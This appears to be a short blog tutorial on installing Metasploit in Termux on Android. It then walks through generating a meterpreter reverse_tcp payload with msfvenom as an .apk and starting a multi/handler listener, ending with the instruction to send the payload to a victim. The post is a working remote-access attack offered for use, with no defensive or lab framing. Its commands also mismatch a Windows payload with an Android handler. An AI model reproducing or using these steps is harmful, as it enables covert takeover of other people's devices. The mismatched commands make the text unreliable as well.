metasploit in termux tamilcode

                   WELCOME TO TAMILCODE


HERE IS TRICKS AND TECHNOLOGY





                            TERMUX COMMANDS FOR ANDROID USER



STEP 1   apt update


STEP 2   apt upgrade


STEP 3   pkg install unstable-repo


STEP 4  cd $HOME


STEP 5   apt install metasploit


now metasploit will install

after installation


STEP 6  msfconsole


STEP 7  now we want create the payload

 msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber  R>filename.apk


STEP 8    now payload will be generate



STEP 9     use exploit/multi/handler


STEP 10   set payload android/meterpreter/reverse_tcp


STEP 11  set LHOST yourip


STEP 12  set LPORT   2734


STEP 13   run


server started now

send the payload  to victim


i hope that you will be understand and please subscribe tamilcode

YOUR THE VISUAL LERNER PLEASE SEE THE VIDEO HERE

               

Post a Comment

0 Comments